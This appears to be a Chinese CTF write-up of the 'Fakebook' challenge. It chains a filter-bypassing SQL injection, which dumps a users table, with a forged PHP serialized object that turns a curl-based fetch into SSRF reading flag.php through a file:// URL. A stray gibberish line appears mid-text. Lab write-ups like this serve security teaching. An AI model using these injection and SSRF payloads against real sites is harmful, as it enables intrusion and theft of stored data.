[网鼎杯 2018]Fakebook

打开题目

 

点击 join 注册,再点击 admin 进入主页

 

 发现注入点no

?no=1 and 1=1 正常

?no=1 and 1=2 报错

猜列数

 

 

 

 

菜擦才能得出基本为分几次日本v人vgtr给他人给他给他给通过通过他

猜列数

 

?no=1 order by 1#
?no=1 order by 2#
?no=1 order by 3#
?no=1 order by 4#
?no=1 order by 5#  // 报错

 查询显示位的时候发现

?no=-1 union select 1,2,3,4#

 

那应该是 select 和 union 不能同时出现(被过滤了),可以用报错注入,用 /**/ 代替空格绕过也行

no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() 
得到表名users

 

no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='users'
得到列名no,username,passwd,data
no=-1 union/**/select 1,group_concat(no,username,passwd,data),3,4 from users
得到数据
1adminb109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:20;s:4:"blog";s:8:"muyi.com";}

用dirsearch扫描查到/robots.txt,访问发现有备份users.php.bak

下载后得到

<?php
 
class UserInfo
{
    // Profile fields. The writeup shows these being rebuilt from a stored
    // serialized string, so their values should be treated as attacker-controlled.
    public $name = "";
    public $age = 0;
    public $blog = "";
 
    /**
     * Builds a profile. Only $age is normalised (cast to int); $name and
     * $blog are stored exactly as given, with no validation in this class.
     */
    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }
 
    /**
     * Fetches $url with curl and returns the response body, or the int 404
     * when the server answered with status 404.
     *
     * Risk: no scheme restriction (e.g. CURLOPT_PROTOCOLS) is applied, so the
     * URL may use any scheme the curl build supports; this is the SSRF the
     * writeup exercises with a file:// URL. Mitigation: allow only http/https
     * and validate the target host before fetching.
     * Note: curl_exec() returns false on transport failure and that value is
     * returned to the caller unchanged.
     */
    function get($url)
    {
        $ch = curl_init();
 
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            // Early return skips the curl_close() below; the handle is not released on this path.
            return 404;
        }
        curl_close($ch);
 
        return $output;
    }
 
    /**
     * Fetches the stored blog URL. isValidBlog() is not consulted here, so
     * whatever is in $blog goes straight to get().
     */
    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }
 
    /**
     * Format check only: optional http/https scheme, dotted hostname of
     * letters/digits/hyphens with a 2-6 letter TLD, optional port, optional
     * path. Returns preg_match()'s result (1 / 0, or false on error).
     * It does not restrict where a fetch may go, and nothing in this class
     * calls it before fetching.
     */
    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}
其中 function get($url) 直接请求传入的 URL,可能存在 SSRF
在这题,查看源码发现data字段存在漏洞。

 

data得到有用数据
O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:20;s:4:"blog";s:8:"muyi.com";}
说明注册时会序列化我们的信息,回显到页面时再反序列化。
这个 data 里的 blog 本来指向我们自己的博客,但把它改为指向 flag.php 就可以构成 SSRF
修改 blog 字段内容为 file:///var/www/html/flag.php,并把对应的 s 改为该字符串的长度 29

O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:20;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

 data字段在第4位,所以放在第4位,构造payload

?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:20;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

 

 查看网页源码

 

 得到flag
